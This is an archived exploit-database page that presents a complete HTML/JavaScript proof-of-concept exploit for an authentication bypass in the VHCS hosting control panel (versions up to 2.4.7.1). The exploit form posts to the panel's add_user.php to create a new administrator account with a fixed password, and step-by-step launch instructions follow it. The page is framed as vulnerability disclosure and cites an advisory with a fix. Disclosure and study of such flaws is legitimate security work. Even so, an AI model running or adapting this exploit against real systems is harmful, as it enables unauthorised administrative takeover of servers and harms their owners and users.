Register | Forget Password | Login
Search :
SecurityReason

News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research
RSS

News

SecurityAlert

ExploitAlert

Apache

PHP
Corporate

Contact

About us
Services

SecurePHP
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com
Details : ExploitAlert

  Topic : VHCS <= 2.4.7.1 (Add User) Authentication Bypass Exploit
  ExploitAlert : 335
  Credit : RoMaNSoFt
  Date : 24.2.2006

  Download

  Exploit Code :  

<html>

<head>
<title>VHCS (version <= 2.4.7.1) PoC. &nbsp;By
RoMaNSoFt</title>
<script language="JavaScript">
function submitform()
{
if (document.admin_add_user.username.value=='admin')
{
alert('Learn to read before launching an exploit,
script-kiddie!');
exit();
}


document.admin_add_user.action=document.admin_add_user.target.val
ue;
document.admin_add_user.submit();
}
</script>
</head>

<body>
<hr>
<center>
<b>VHCS (version <= 2.4.7.1) PoC. &nbsp;By
RoMaNSoFt &#60roman&#64rs-labs.com&#62
&nbsp;[08.Feb.2006]</b>

</center>
<hr>

<form name="admin_add_user" method="post"
action="">
<table width="100%"
cellpadding="5" cellspacing="5">
<tr>
<td
width="20">&nbsp;</td>
<td colspan="2">
&nbsp;
</td>

</tr>
<tr>
<td
width="20">&nbsp;</td> <td
width="200">Target URL</td>
<td>
<input type="text"
name="target"
value="http://<target>/vhcs2/admin/add_user.php"
style="width:400px">
</td>
</tr>

<tr>

<td
width="20">&nbsp;</td> <td
width="200">Username</td>
<td>
<input type="text"
name="username" value="admin"
style="width:200px">&nbsp;(should NOT exist)
</td>
</tr>
<tr>
<td>&nbsp;</td>
<td colspan="2"><a
href="javascript: submitform()">Exploit
it!</a></td>
</tr>

<tr>
<td colspan="3">&nbsp;
</td>
</tr>
</table>
<input type="hidden"
name="pass" value="dsrrocks">
<input type="hidden"
name="pass_rep" value="dsrrocks">
<input type="hidden"
name="email"
value="vhcs-exploit@rs-labs.com">
<input type="hidden"
name="uaction" value="add_user">
</form>


<hr>
<br>
<u>Quick instructions</u>.-<br>
<br>
1.- Enable JavaScript. Fill in the form with appropiate
target URL (usually you will only need to replace
&#60target&#62 string) and username.<br>
2.- Remember not to use a probably existing username
(such as "admin").<br>

3.- Launch the exploit. <i>If target system is
vulnerable, a new VHCS admin user will be created</i>
;-)<br>
4.- You will be redirected to VHCS login page. Try to
login with your brand new username.<br>
5.- Ummm, I forgot it... The password is:
<b>dsrrocks</b>.<br>

<br>

<u>More info (analysis, fix,
etc)</u>.-<br>
<br>
See <a
href=http://www.rs-labs.com/adv/RS-Labs-Advisory-2006-1.txt>&l
t;i>RS-2006-1</i></a>.<br>
<br>
<hr>
</body>

</html>
Alert

*BSD libc (strfmon) Multiple vulnerabilities

high- 2008-03-25

Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems.
Apache rss

» Apache-SSL memory
   disclosure

» Apache mod_negotiation
   Xss and Http Response
   Splitting

» Apache (mod_status)
   Refresh Header - Open
   Redirector (XSS)

» Apache (mod_proxy_ftp)
   Undefined Charset UTF-7
   XSS Vulnerability
PHP rss

» PHP 5.2.5 and prior :
   *printf() functions
   Integer Overflow

» PHP 5.2.5 cURL safe_mode
   bypass

» PHP 5.2.4
   mail.force_extra_paramete
   rs unsecure

» PHP <= 5.2.5
   stream_wrapper_register()
   Denial of service
Copyright © SecurityReason. All Rights Reserved.